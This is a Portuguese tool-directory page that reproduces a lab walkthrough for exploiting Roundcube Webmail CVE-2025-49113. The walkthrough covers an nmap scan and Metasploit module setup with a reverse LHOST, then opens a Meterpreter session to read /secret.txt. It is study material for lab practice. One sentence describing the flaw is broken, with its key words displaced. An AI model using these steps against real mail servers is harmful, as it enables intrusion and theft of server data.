Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
roundcube-cve-2025-49113-lab — Laboratório prático de exploração para o Roundcube Webmail CVE-2025-49113 (desserialização de objeto PHP autenticada → RCE) para ler /secret.txt. | Kitploit
Ferramentas/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoRed TeamingDesenvolvimento de Payloads
Labs e Prática
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

Laboratório prático de exploração para o Roundcube Webmail CVE-2025-49113 (desserialização de objeto PHP autenticada → RCE) para ler /secret.txt.

Ver Repositório
3há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

"AVISO: Apenas para uso educacional"

Laboratório Roundcube Webmail RCE – CVE-2025-49113

Este repositório documenta minha exploração passo a passo do Roundcube Webmail CVE-2025-49113 em um laboratório controlado para obter o segredo armazenado em /secret.txt.

⚠️ Aviso
Todo o trabalho foi realizado em um ambiente de laboratório/treinamento que estou autorizado a testar.
Não use essas técnicas contra sistemas que você não possui ou administra.


Desafio

O Roundcube Webmail é um cliente de e-mail PHP de código aberto baseado em navegador que se conecta a caixas de correio via IMAP e envia e-mails via SMTP. Ele geralmente roda em Apache ou Nginx com MySQL/PostgreSQL/SQLite e é amplamente utilizado em ambientes de hospedagem compartilhada.

Vulnerabilidade – CVE-2025-49113

Todas as versões do Roundcube até 1.6.10 inclusive (e 1.5.x anteriores a 1.5.10) contêm um bug crítico em program/actions/settings/upload.php. O parâmetro não é validado corretamente, o que permite que um atacante autenticado acione a e alcance a com privilégios do servidor web.

_from
desserialização insegura de objetos PHP
execução remota de código

Credenciais do laboratório:

  • Usuário: roundcube
  • Senha: rcpass

Objetivo:

Qual é o segredo dentro do arquivo /secret.txt?


Ambiente do Laboratório

  • Host atacante: Kali / HackerBox com:
    • nmap
    • msfconsole (Metasploit 6)
  • Host alvo: Roundcube Webmail em 172.20.2.57
  • Exploit utilizado: exploit/multi/http/roundcube_auth_rce_cve_2025_49113

Passo a Passo

Passo 1 – Descoberta de serviços com Nmap

Comando: nmap -sV Target Machine

Passo 2 - Localizando um exploit de desserialização de objetos PHP no Metasploit

search php object deserialization

Passo 3 - Configurando o módulo de exploit do Roundcube

msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

Passo 4 - Obtendo uma sessão Meterpreter e lendo /secret.txt

meterpreter > cat /secret.txt

Baixar ferramenta